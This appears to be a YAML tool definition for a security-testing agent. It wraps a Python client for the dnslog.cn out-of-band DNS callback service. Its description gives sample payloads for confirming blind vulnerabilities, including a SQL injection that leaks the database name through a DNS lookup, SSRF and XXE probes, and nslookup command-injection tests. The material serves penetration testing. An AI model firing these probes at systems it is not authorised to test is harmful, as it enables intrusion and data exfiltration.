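# dnslog tool definition: "command" plus "args" run the embedded Python script
# below; "parameters" maps positional arguments onto that script's argv.
name: "dnslog"
command: "python3"
args:
  - "-c"
  - |
    import json
    import os
    import sys
    import tempfile
    import time

    import requests

    # Usage: <get_domain|get_records> [domain] [wait_time]
    # Prints exactly one JSON document to stdout; exits 1 on any error
    # (human-readable diagnostics go to stderr).

    if len(sys.argv) < 2:
        sys.stderr.write("错误: 缺少操作类型参数 (get_domain 或 get_records)\n")
        sys.exit(1)

    operation = sys.argv[1]
    # dnslog.cn is reached over plain HTTP, so the PHPSESSID cookie handled
    # below travels in clear text on the network path.
    base_url = "http://dnslog.cn"

    # The session cookie is persisted between get_domain and get_records in a
    # fixed-name file in the shared temp directory. save_cookies() creates it
    # owner-readable only; that mode applies at creation, not to a file that
    # already exists with wider permissions.
    cookie_file = os.path.join(tempfile.gettempdir(), "dnslog_cookie.txt")

    session = requests.Session()


    def emit(payload):
        """Print payload to stdout as indented JSON, keeping non-ASCII text readable."""
        print(json.dumps(payload, ensure_ascii=False, indent=2))


    def load_cookie():
        """Best-effort: restore PHPSESSID from cookie_file into the session.

        A missing or unreadable file and malformed lines are ignored on purpose:
        the next request then simply starts a fresh dnslog.cn session.
        """
        if not os.path.exists(cookie_file):
            return
        try:
            with open(cookie_file, "r") as f:
                for line in f:
                    # Lines are written by save_cookies() as "name=value".
                    name, sep, value = line.strip().partition("=")
                    if sep and name == "PHPSESSID" and value:
                        session.cookies.set("PHPSESSID", value)
        except (OSError, ValueError):
            pass


    def save_cookies():
        """Best-effort: persist the session's cookies as "name=value" lines.

        The file is created with mode 0600 because it holds the service session
        cookie; write failures are ignored so get_domain still reports its result.
        """
        try:
            fd = os.open(cookie_file, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
            with os.fdopen(fd, "w") as f:
                for cookie in session.cookies:
                    f.write(f"{cookie.name}={cookie.value}\n")
        except OSError:
            pass


    def no_records(domain, message):
        """Result document for a domain that has no DNS records yet."""
        return {"status": "no_records", "domain": domain, "records": [], "message": message}


    def found_records(domain, records):
        """Result document for a domain with at least one DNS record."""
        return {
            "status": "success",
            "domain": domain,
            "record_count": len(records),
            "records": records,
            "message": f"发现 {len(records)} 条DNS查询记录",
        }


    def get_domain():
        """Request a fresh temporary domain, then store the session cookie it set."""
        response = session.get(f"{base_url}/getdomain.php", timeout=10)
        response.raise_for_status()
        # The reply is plain text; a trailing '%' is stripped as before.
        domain = response.text.strip().rstrip("%")

        save_cookies()

        if not domain:
            emit({"status": "error", "message": "未能获取到域名,请稍后重试"})
            sys.exit(1)
        emit({
            "status": "success",
            "domain": domain,
            "message": f"成功获取临时域名: {domain}",
            "usage": f"使用此域名进行DNS查询测试,例如: nslookup {domain} 或 ping http://{domain}",
            "note": "域名有效期为24小时,请及时查询记录",
        })


    def get_records():
        """Fetch the DNS query records for the domain given as argv[2].

        argv[3], when present and non-empty, is a number of seconds to sleep
        before querying; a non-numeric value surfaces as a generic error.
        """
        if len(sys.argv) < 3:
            sys.stderr.write("错误: get_records 操作需要提供域名参数\n")
            sys.exit(1)

        domain = sys.argv[2]
        wait_time = int(sys.argv[3]) if len(sys.argv) > 3 and sys.argv[3] else 0

        if wait_time > 0:
            print(f"等待 {wait_time} 秒后查询记录...", file=sys.stderr)
            time.sleep(wait_time)

        # Re-read the cookie file: a concurrent get_domain may have rewritten it.
        load_cookie()

        response = session.get(f"{base_url}/getrecords.php", params={"t": domain}, timeout=10)
        response.raise_for_status()
        records_text = response.text.strip().rstrip("%")

        if not records_text or records_text == "[]":
            emit(no_records(domain, "暂无DNS查询记录,目标可能尚未触发DNS查询"))
            return

        # Prefer a JSON array; fall back to one record per line of plain text.
        try:
            records = json.loads(records_text)
            empty_message = "暂无DNS查询记录,目标可能尚未触发DNS查询"
        except json.JSONDecodeError:
            records = [
                line.strip()
                for line in records_text.split("\n")
                if line.strip() and line.strip() != "[]"
            ]
            empty_message = "暂无DNS查询记录"

        if isinstance(records, list) and records:
            emit(found_records(domain, records))
        else:
            emit(no_records(domain, empty_message))


    load_cookie()

    try:
        if operation == "get_domain":
            get_domain()
        elif operation == "get_records":
            get_records()
        else:
            sys.stderr.write(f"错误: 未知的操作类型 '{operation}',支持的操作: get_domain, get_records\n")
            sys.exit(1)
    except requests.RequestException as e:
        emit({
            "status": "error",
            "message": f"请求失败: {e}",
            "suggestion": "请检查网络连接或稍后重试",
        })
        sys.exit(1)
    except Exception as e:
        emit({"status": "error", "message": f"执行出错: {e}"})
        sys.exit(1)
enabled: true
short_description: "DNSlog工具,用于盲注、SSRF、XXE等无回显漏洞验证"
description: |
  DNSlog是一个DNS查询记录工具,通过dnslog.cn服务实现。主要用于验证无回显漏洞,如盲注、SSRF、XXE、命令注入等。

  **主要功能:**
  - 获取临时域名:生成一个唯一的临时域名用于DNS查询测试
  - 查询DNS记录:查看是否有DNS查询请求到达该域名
  - 支持等待时间:可在查询前等待指定时间,用于异步漏洞验证

  **使用场景:**
  - **盲SQL注入测试**:在SQL注入payload中使用DNS查询来确认注入成功
    - 示例:`SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.xxx.dnslog.cn\\abc'))`
  - **SSRF漏洞验证**:通过DNS查询确认SSRF漏洞存在
    - 示例:`http://target.com/api?url=http://xxx.dnslog.cn`
  - **XXE漏洞验证**:通过外部实体引用触发DNS查询
    - 示例:`<!ENTITY xxe SYSTEM "http://xxx.dnslog.cn">`
  - **命令注入测试**:在命令注入payload中使用DNS查询
    - 示例:`nslookup xxx.dnslog.cn` 或 `ping xxx.dnslog.cn`
  - **无回显漏洞验证**:任何需要确认目标是否执行了特定操作的情况

  **工作流程:**
  1. 使用 `operation=get_domain` 获取临时域名(如:`abc123.dnslog.cn`)
  2. 在漏洞测试payload中使用该域名
  3. 使用 `operation=get_records` 查询是否有DNS查询记录
  4. 如果看到记录,说明漏洞存在且payload已执行

  **注意事项:**
  - 临时域名有效期为24小时
  - DNS查询可能有延迟,建议等待几秒后再查询记录
  - 该工具依赖dnslog.cn服务,需要网络连接
  - 工具会自动管理Cookie会话,确保获取域名和查询记录使用同一会话
parameters:
  - name: "operation"
    type: "string"
    description: |
      操作类型,支持两种操作:
      - `get_domain`: 获取临时域名
      - `get_records`: 查询DNS记录
    required: true
    position: 0
    format: "positional"
  - name: "domain"
    type: "string"
    description: |
      域名参数(仅用于get_records操作)

      当operation为get_records时,此参数为必填,需要提供之前获取的临时域名。
    required: false
    position: 1
    format: "positional"
  - name: "wait_time"
    type: "int"
    description: |
      等待时间(秒,仅用于get_records操作)

      在查询DNS记录前等待的秒数。用于给目标系统足够时间执行DNS查询。
      建议值:3-10秒,根据网络延迟和漏洞类型调整。
    required: false
    position: 2
    format: "positional"
    default: 0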